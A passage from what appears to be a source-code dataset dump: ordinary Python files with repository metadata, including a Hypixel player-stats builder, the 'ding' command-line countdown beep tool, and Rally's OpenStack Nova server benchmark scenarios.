"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_duel_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_duel_damage_dealt", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_kills",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_doubles_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_doubles_damage_dealt", 0),
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_losses", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_four_bow_hits",
0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_four_damage_dealt", 0),
},
"deathmatch": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_rounds_played", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_deaths",
0),
"wins": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get("uhc_meetup_losses",
0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"current_uhc_winstreak", 0),
"melee_swings": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_melee_swings", 0),
"melee_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_melee_hits", 0),
"bow_shots": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_bow_shots", 0),
"bow_hits": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_bow_hits", 0),
"damage_dealt": player_json.get("player", {}).get("stats", {}).get("Duels", {}).get(
"uhc_meetup_damage_dealt", 0),
}
}
},
"paintball": {
"coins": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("coins", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("wins", 0),
"killstreaks": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("killstreaks", 0),
"shots_fired": player_json.get("player", {}).get("stats", {}).get("Paintball", {}).get("shots_fired", 0)
},
"skywars": {
"level_data": (await core.minecraft.hypixel.static.static.get_skywars_level_data_from_experience(
(player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("skywars_experience", 0)))),
"coins": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("coins", 0),
"tokens": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("cosmetic_tokens", 0),
"souls": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("souls", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("kills", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("deaths", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("wins", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get("losses", 0),
"games_played": player_json.get("player", {}).get("stats", {}).get("SkyWars", {}).get(
"games_played_skywars", 0)
}
}
await core.caches.players.save_player_data(uuid, player)
return player
| 79.969524
| 121
| 0.459175
|
9cb1e7c8f63b1956c75ff93d15cafb794c32f575
| 4,914
|
py
|
Python
|
ding/ding.py
|
liviu-/ding
|
14e49439b3898ba364921fe8519b3befd2f2ef01
|
[
"MIT"
] | 417
|
2016-10-02T19:15:05.000Z
|
2022-02-04T11:31:27.000Z
|
ding/ding.py
|
liviu-/ding
|
14e49439b3898ba364921fe8519b3befd2f2ef01
|
[
"MIT"
] | 11
|
2016-09-30T14:38:07.000Z
|
2016-10-28T21:04:02.000Z
|
ding/ding.py
|
liviu-/ding
|
14e49439b3898ba364921fe8519b3befd2f2ef01
|
[
"MIT"
] | 23
|
2016-10-04T00:23:49.000Z
|
2022-02-26T00:57:43.000Z
|
#!/usr/bin/env python
"""Simple CLI beep tool"""
from __future__ import unicode_literals
from __future__ import print_function
import re
import os
import sys
import time
import datetime
import argparse
VERSION = '2.1.0'
N_BEEPS = 4
WAIT_BEEPS = 0.15
def relative_time(arg):
"""Validate user provided relative time"""
if not re.match('\d+[smh]( +\d+[smh])*', arg):
raise argparse.ArgumentTypeError("Invalid time format: {}".format(arg))
return arg
def absolute_time(arg):
"""Validate user provided absolute time"""
if not all([t.isdigit() for t in arg.split(':')]):
raise argparse.ArgumentTypeError("Invalid time format: {}".format(arg))
# Valid time (e.g. hour must be between 0..23)
try:
datetime.time(*map(int, arg.split(':')))
except ValueError as e:
raise argparse.ArgumentTypeError("Invalid time format: {}".format(e))
return arg
def get_args(args):
"""Parse commandline arguments"""
parent_parser = argparse.ArgumentParser(
add_help=False, description='Lightweight time management CLI tool')
parent_parser.add_argument(
'-n', '--no-timer', action='store_true', help='Hide the countdown timer')
parent_parser.add_argument(
'-c', '--command', type=str, help='Use a custom command instead of the default beep')
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--version', action='version', version=VERSION)
subparsers = parser.add_subparsers(dest='mode')
subparsers.required = True
parser_in = subparsers.add_parser('in', parents=[parent_parser])
parser_in.add_argument('time', nargs='+', type=relative_time,
help='relative time \d+[smh]( +\d+[smh])* (e.g. 1h 30m)')
parser_every = subparsers.add_parser('every', parents=[parent_parser])
parser_every.add_argument('time', nargs='+', type=relative_time,
help='relative time \d+[smh]( +\d+[smh])* (e.g. 2m 15s)')
parser_at = subparsers.add_parser('at', parents=[parent_parser])
parser_at.add_argument('time', type=absolute_time, help='absolute time [hh:[mm[:ss]]]')
return parser.parse_args(args)
class TimeParser():
"""Class helping with parsing user provided time into seconds"""
time_map = {
's': 1,
'm': 60,
'h': 60 * 60,
}
def __init__(self, time, relative):
self.time = time
self.relative = relative
def get_seconds(self):
return self._get_seconds_relative() if self.relative else self._get_seconds_absolute()
def _get_seconds_relative(self):
return sum([self.time_map[t[-1]] * int(t[:-1]) for t in self.time])
def _get_seconds_absolute(self):
now = datetime.datetime.now()
user_time = (datetime.datetime.combine(datetime.date.today(),
datetime.time(*map(int, self.time.split(':')))))
return ((user_time - now).seconds if user_time > now
else (user_time + datetime.timedelta(days=1) - now).seconds)
def countdown(seconds, notimer=False):
"""Countdown for `seconds`, printing values unless `notimer`"""
if not notimer:
os.system('cls' if os.name == 'nt' else 'clear') # initial clear
while seconds > 0:
start = time.time()
# print the time without a newline or carriage return
# this leaves the cursor at the end of the time while visible
if not notimer:
print(datetime.timedelta(seconds=seconds), end='')
sys.stdout.flush()
seconds -= 1
time.sleep(1 - time.time() + start)
# emit a carriage return
# this moves the cursor back to the beginning of the line
# so the next time overwrites the current time
if not notimer:
print(end='\r')
def beep(seconds, command):
"""Make the beep noise"""
for _ in range(N_BEEPS):
if command:
os.system(command)
else:
sys.stdout.write('\a')
sys.stdout.flush()
time.sleep(WAIT_BEEPS)
def parse_time(args):
"""Figure out the number of seconds to wait"""
relative = args.mode == 'in' or args.mode == "every"
parser = TimeParser(args.time, relative)
return parser.get_seconds()
def main(args=sys.argv[1:]):
args = get_args(args)
while True:
try:
seconds = parse_time(args)
countdown(seconds, args.no_timer)
beep(seconds, args.command)
# doing `if` here so there just can't be any stack printed for an interrupt
if args.mode != "every":
break
except KeyboardInterrupt:
print() # ending current line
break # without printing useless stack...
if __name__ == '__main__':
main()
| 32.979866
| 98
| 0.610297
|
a84b22812bab0dee55457d4b527df317da5e5897
| 30,108
|
py
|
Python
|
rally/plugins/openstack/scenarios/nova/servers.py
|
aforalee/rallyALi
|
8050ca08b0e253aeb19a1cec34f33c648f00136a
|
[
"Apache-2.0"
] | 2
|
2015-02-06T11:03:12.000Z
|
2015-03-02T10:39:44.000Z
|
rally/plugins/openstack/scenarios/nova/servers.py
|
aforalee/rallyALi
|
8050ca08b0e253aeb19a1cec34f33c648f00136a
|
[
"Apache-2.0"
] | null | null | null |
rally/plugins/openstack/scenarios/nova/servers.py
|
aforalee/rallyALi
|
8050ca08b0e253aeb19a1cec34f33c648f00136a
|
[
"Apache-2.0"
] | 2
|
2016-03-16T03:52:13.000Z
|
2020-10-02T07:58:50.000Z
|
# Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import jsonschema
from rally.common import log as logging
from rally import consts
from rally import exceptions as rally_exceptions
from rally.plugins.openstack import scenario
from rally.plugins.openstack.scenarios.cinder import utils as cinder_utils
from rally.plugins.openstack.scenarios.nova import utils
from rally.plugins.openstack.wrappers import network as network_wrapper
from rally.task import types
from rally.task import utils as task_utils
from rally.task import validation
LOG = logging.getLogger(__name__)
class NovaServers(utils.NovaScenario,
cinder_utils.CinderScenario):
"""Benchmark scenarios for Nova servers."""
RESOURCE_NAME_PREFIX = "rally_novaserver_"
RESOURCE_NAME_LENGTH = 16
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_list_server(self, image, flavor,
detailed=True, **kwargs):
"""Boot a server from an image and then list all servers.
Measure the "nova list" command performance.
If you have only 1 user in your context, you will
add 1 server on every iteration. So you will have more
and more servers and will be able to measure the
performance of the "nova list" command depending on
the number of servers owned by users.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param detailed: True if the server listing should contain
detailed information about all of them
:param kwargs: Optional additional arguments for server creation
"""
self._boot_server(image, flavor, **kwargs)
self._list_servers(detailed)
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def list_servers(self, detailed=True):
"""List all servers.
This simple scenario test the nova list command by listing
all the servers.
:param detailed: True if detailed information about servers
should be listed
"""
self._list_servers(detailed)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_delete_server(self, image, flavor,
min_sleep=0, max_sleep=0,
force_delete=False, **kwargs):
"""Boot and delete a server.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between volume creation and deletion
(of random duration from [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self.sleep_between(min_sleep, max_sleep)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_delete_multiple_servers(self, image, flavor, count=2,
min_sleep=0, max_sleep=0,
force_delete=False, **kwargs):
"""Boot multiple servers in a single request and delete them.
Deletion is done in parallel with one request per server, not
with a single request for all servers.
:param image: The image to boot from
:param flavor: Flavor used to boot instance
:param count: Number of instances to boot
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for instance creation
"""
servers = self._boot_servers(image, flavor, 1, instances_amount=count,
**kwargs)
self.sleep_between(min_sleep, max_sleep)
self._delete_servers(servers, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova", "cinder"]})
def boot_server_from_volume_and_delete(self, image, flavor,
volume_size,
min_sleep=0, max_sleep=0,
force_delete=False, **kwargs):
"""Boot a server from volume and then delete it.
The scenario first creates a volume and then a server.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between volume creation and deletion
(of random duration from [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param volume_size: volume size (in GB)
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
volume = self._create_volume(volume_size, imageRef=image)
block_device_mapping = {"vda": "%s:::1" % volume.id}
server = self._boot_server(image, flavor,
block_device_mapping=block_device_mapping,
**kwargs)
self.sleep_between(min_sleep, max_sleep)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_bounce_server(self, image, flavor,
force_delete=False, actions=None, **kwargs):
"""Boot a server and run specified actions against it.
Actions should be passed into the actions parameter. Available actions
are 'hard_reboot', 'soft_reboot', 'stop_start' and 'rescue_unrescue'.
Delete server after all actions were completed.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param actions: list of action dictionaries, where each action
dictionary speicifes an action to be performed
in the following format:
{"action_name": <no_of_iterations>}
:param kwargs: Optional additional arguments for server creation
"""
action_builder = self._bind_actions()
actions = actions or []
try:
action_builder.validate(actions)
except jsonschema.exceptions.ValidationError as error:
raise rally_exceptions.InvalidConfigException(
"Invalid server actions configuration \'%(actions)s\' due to: "
"%(error)s" % {"actions": str(actions), "error": str(error)})
server = self._boot_server(image, flavor, **kwargs)
for action in action_builder.build_actions(actions, server):
action()
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_lock_unlock_and_delete(self, image, flavor,
min_sleep=0, max_sleep=0,
force_delete=False,
**kwargs):
"""Boot a server, lock it, then unlock and delete it.
Optional 'min_sleep' and 'max_sleep' parameters allow the
scenario to simulate a pause between locking and unlocking the
server (of random duration from min_sleep to max_sleep).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param min_sleep: Minimum sleep time between locking and unlocking
in seconds
:param max_sleep: Maximum sleep time between locking and unlocking
in seconds
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._lock_server(server)
self.sleep_between(min_sleep, max_sleep)
self._unlock_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.GLANCE)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova", "glance"]})
def snapshot_server(self, image, flavor,
force_delete=False, **kwargs):
"""Boot a server, make its snapshot and delete both.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
image = self._create_image(server)
self._delete_server(server, force=force_delete)
server = self._boot_server(image.id, flavor, **kwargs)
self._delete_server(server, force=force_delete)
self._delete_image(image)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_server(self, image, flavor, auto_assign_nic=False, **kwargs):
"""Boot a server.
Assumes that cleanup is done elsewhere.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param auto_assign_nic: True if NICs should be assigned
:param kwargs: Optional additional arguments for server creation
"""
self._boot_server(image, flavor,
auto_assign_nic=auto_assign_nic, **kwargs)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova", "cinder"]})
def boot_server_from_volume(self, image, flavor, volume_size,
auto_assign_nic=False, **kwargs):
"""Boot a server from volume.
The scenario first creates a volume and then a server.
Assumes that cleanup is done elsewhere.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param volume_size: volume size (in GB)
:param auto_assign_nic: True if NICs should be assigned
:param kwargs: Optional additional arguments for server creation
"""
volume = self._create_volume(volume_size, imageRef=image)
block_device_mapping = {"vda": "%s:::1" % volume.id}
self._boot_server(image, flavor, auto_assign_nic=auto_assign_nic,
block_device_mapping=block_device_mapping,
**kwargs)
def _bind_actions(self):
actions = ["hard_reboot", "soft_reboot", "stop_start",
"rescue_unrescue"]
action_builder = task_utils.ActionBuilder(actions)
action_builder.bind_action("hard_reboot", self._reboot_server)
action_builder.bind_action("soft_reboot", self._soft_reboot_server)
action_builder.bind_action("stop_start",
self._stop_and_start_server)
action_builder.bind_action("rescue_unrescue",
self._rescue_and_unrescue_server)
return action_builder
def _stop_and_start_server(self, server):
"""Stop and then start the given server.
A stop will be issued on the given server upon which time
this method will wait for the server to become 'SHUTOFF'.
Once the server is SHUTOFF a start will be issued and this
method will wait for the server to become 'ACTIVE' again.
:param server: The server to stop and then start.
"""
self._stop_server(server)
self._start_server(server)
def _rescue_and_unrescue_server(self, server):
"""Rescue and then unrescue the given server.
A rescue will be issued on the given server upon which time
this method will wait for the server to become 'RESCUE'.
Once the server is RESCUE a unrescue will be issued and
this method will wait for the server to become 'ACTIVE'
again.
:param server: The server to rescue and then unrescue.
"""
self._rescue_server(server)
self._unrescue_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType,
to_flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def resize_server(self, image, flavor, to_flavor,
force_delete=False, **kwargs):
"""Boot a server, then resize and delete it.
This test will confirm the resize by default,
or revert the resize if confirm is set to false.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param to_flavor: flavor to be used to resize the booted instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._resize(server, to_flavor)
# by default we confirm
confirm = kwargs.get("confirm", True)
if confirm:
self._resize_confirm(server)
else:
self._resize_revert(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def suspend_and_resume_server(self, image, flavor,
force_delete=False, **kwargs):
"""Create a server, suspend, resume and then delete it
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._suspend_server(server)
self._resume_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def pause_and_unpause_server(self, image, flavor,
force_delete=False, **kwargs):
"""Create a server, pause, unpause and then delete it
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._pause_server(server)
self._unpause_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def shelve_and_unshelve_server(self, image, flavor,
force_delete=False, **kwargs):
"""Create a server, shelve, unshelve and then delete it
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param force_delete: True if force_delete should be used
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._shelve_server(server)
self._unshelve_server(server)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_live_migrate_server(self, image,
flavor, block_migration=False,
disk_over_commit=False, min_sleep=0,
max_sleep=0, **kwargs):
"""Live Migrate a server.
This scenario launches a VM on a compute node available in
the availability zone and then migrates the VM to another
compute node on the same availability zone.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between VM booting and running live migration
(of random duration from range [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param block_migration: Specifies the migration type
:param disk_over_commit: Specifies whether to allow overcommit
on migrated instance or not
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self.sleep_between(min_sleep, max_sleep)
new_host = self._find_host_to_migrate(server)
self._live_migrate(server, new_host,
block_migration, disk_over_commit)
self._delete_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova", "cinder"]})
def boot_server_from_volume_and_live_migrate(self, image, flavor,
volume_size,
block_migration=False,
disk_over_commit=False,
force_delete=False,
min_sleep=0, max_sleep=0,
**kwargs):
"""Boot a server from volume and then migrate it.
The scenario first creates a volume and a server booted from
the volume on a compute node available in the availability zone and
then migrates the VM to another compute node on the same availability
zone.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between VM booting and running live migration
(of random duration from range [min_sleep, max_sleep]).
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param volume_size: volume size (in GB)
:param block_migration: Specifies the migration type
:param disk_over_commit: Specifies whether to allow overcommit
on migrated instance or not
:param force_delete: True if force_delete should be used
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
:param kwargs: Optional additional arguments for server creation
"""
volume = self._create_volume(volume_size, imageRef=image)
block_device_mapping = {"vda": "%s:::1" % volume.id}
server = self._boot_server(image, flavor,
block_device_mapping=block_device_mapping,
**kwargs)
self.sleep_between(min_sleep, max_sleep)
new_host = self._find_host_to_migrate(server)
self._live_migrate(server, new_host,
block_migration, disk_over_commit)
self._delete_server(server, force=force_delete)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA, consts.Service.CINDER)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["cinder", "nova"]})
def boot_server_attach_created_volume_and_live_migrate(
self,
image,
flavor,
size,
block_migration=False,
disk_over_commit=False,
boot_server_kwargs=None,
create_volume_kwargs=None,
min_sleep=0,
max_sleep=0):
"""Create a VM, attach a volume to it and live migrate.
Simple test to create a VM and attach a volume, then migrate the VM,
detach the volume and delete volume/VM.
Optional 'min_sleep' and 'max_sleep' parameters allow the scenario
to simulate a pause between attaching a volume and running live
migration (of random duration from range [min_sleep, max_sleep]).
:param image: Glance image name to use for the VM
:param flavor: VM flavor name
:param size: volume size (in GB)
:param block_migration: Specifies the migration type
:param disk_over_commit: Specifies whether to allow overcommit
on migrated instance or not
:param boot_server_kwargs: optional arguments for VM creation
:param create_volume_kwargs: optional arguments for volume creation
:param min_sleep: Minimum sleep time in seconds (non-negative)
:param max_sleep: Maximum sleep time in seconds (non-negative)
"""
if boot_server_kwargs is None:
boot_server_kwargs = {}
if create_volume_kwargs is None:
create_volume_kwargs = {}
server = self._boot_server(image, flavor, **boot_server_kwargs)
volume = self._create_volume(size, **create_volume_kwargs)
self._attach_volume(server, volume)
self.sleep_between(min_sleep, max_sleep)
new_host = self._find_host_to_migrate(server)
self._live_migrate(server, new_host,
block_migration, disk_over_commit)
self._detach_volume(server, volume)
self._delete_volume(volume)
self._delete_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_migrate_server(self, image, flavor, **kwargs):
"""Migrate a server.
This scenario launches a VM on a compute node available in
the availability zone and stops the VM, and then migrates the VM
to another compute node on the same availability zone.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
self._stop_server(server)
self._migrate(server)
# NOTE(wtakase): This is required because cold migration and resize
# share same code path.
confirm = kwargs.get("confirm", True)
if confirm:
self._resize_confirm(server, status="SHUTOFF")
else:
self._resize_revert(server, status="SHUTOFF")
self._delete_server(server)
@types.set(from_image=types.ImageResourceType,
to_image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "from_image")
@validation.image_valid_on_flavor("flavor", "to_image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(admin=True, users=True)
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_rebuild_server(self, from_image, to_image, flavor, **kwargs):
"""Rebuild a server.
This scenario launches a VM, then rebuilds that VM with a
different image.
:param from_image: image to be used to boot an instance
:param to_image: image to be used to rebuild the instance
:param flavor: flavor to be used to boot an instance
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(from_image, flavor, **kwargs)
self._rebuild_server(server, to_image)
self._delete_server(server)
@types.set(image=types.ImageResourceType,
flavor=types.FlavorResourceType)
@validation.image_valid_on_flavor("flavor", "image")
@validation.required_services(consts.Service.NOVA)
@validation.required_openstack(users=True)
@validation.required_contexts("network")
@scenario.configure(context={"cleanup": ["nova"]})
def boot_and_associate_floating_ip(self, image, flavor, **kwargs):
"""Boot a server and associate a floating IP to it.
:param image: image to be used to boot an instance
:param flavor: flavor to be used to boot an instance
:param kwargs: Optional additional arguments for server creation
"""
server = self._boot_server(image, flavor, **kwargs)
address = network_wrapper.wrap(
self.clients, self.context["task"]).create_floating_ip(
tenant_id=server.tenant_id)
self._associate_floating_ip(server, address["ip"])
| 46.462963
| 79
| 0.657201
|
ee7f8fa38ef4a09b9dd4c0a265a336c843e81aae
| 3,322
|
py
|
Python
|
models/simclr.py
|
ashwinipokle/contrastive_landscape
|
daec951c7a4cfc6c96464e0ef010081a642e3847
|
[
"MIT"
] | 2
|
2022-03-30T07:24:07.000Z
|
2022-03-30T07:53:44.000Z
|
models/simclr.py
|
ashwinipokle/contrastive_landscape
|
